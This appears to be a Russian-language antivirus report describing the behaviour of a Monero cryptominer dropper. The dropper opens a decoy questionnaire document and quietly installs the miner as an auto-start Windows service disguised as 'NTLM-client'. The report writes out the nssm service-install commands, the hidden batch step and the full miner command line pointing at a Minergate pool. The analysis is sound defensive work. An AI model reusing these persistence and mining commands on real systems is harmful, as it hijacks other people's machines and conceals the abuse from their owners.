Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [HKLM\System\CurrentControlSet\Services\NTLM-client] 'Start' = '00000002'
- [HKLM\System\CurrentControlSet\Services\NTLM-client] 'ImagePath' = '%TEMP%\DE1E.tmp\nssm.exe'
Создает следующие сервисы
- 'NTLM-client' %TEMP%\DE1E.tmp\nssm.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\de1e.tmp\de1f.bat
- %TEMP%\de1e.tmp\anketa-aleexe.docx
- %TEMP%\de1e.tmp\nssm.exe
- %TEMP%\de1e.tmp\ntlm.exe
- %WINDIR%\ntlm.exe
- %TEMP%\de1e.tmp\anketa-aleex.docx
- %TEMP%\de1e.tmp\~$keta-aleexe.docx
Удаляет следующие файлы
- %TEMP%\de1e.tmp\de1f.bat
Сетевая активность
Подключается к
- 'xm#.###l.minergate.com':45560
UDP
- DNS ASK xm#.###l.minergate.com
Другое
Создает и запускает на исполнение
- '%TEMP%\de1e.tmp\nssm.exe' install NTLM-client %WINDIR%\ntlm.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u joy.walters94@zoho.eu -p x -t 0 -dbg -1 /LOW
- '%TEMP%\de1e.tmp\nssm.exe' set NTLM-client Description "Required for NTLM-service"
- '%TEMP%\de1e.tmp\nssm.exe' set NTLM-client Start SERVICE_AUTO_START
- '%TEMP%\de1e.tmp\nssm.exe'
- '%WINDIR%\ntlm.exe' -o stratum+tcp://xmr.pool.minergate.com:45560 -u joy.walters94@zoho.eu -p x -t 0 -dbg -1 /LOW
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\DE1E.tmp\DE1F.bat <Полный путь к файлу>" (со скрытым окном)
- '<SYSTEM32>\tasklist.exe' /FI "ImageName EQ NTLM-client"
- '<SYSTEM32>\find.exe' /I "NTLM-client"
- '<SYSTEM32>\sc.exe' start NTLM-client
- '%ProgramFiles%\microsoft office\office14\winword.exe' /n "%TEMP%\DE1E.tmp\Anketa-aleexe.docx"
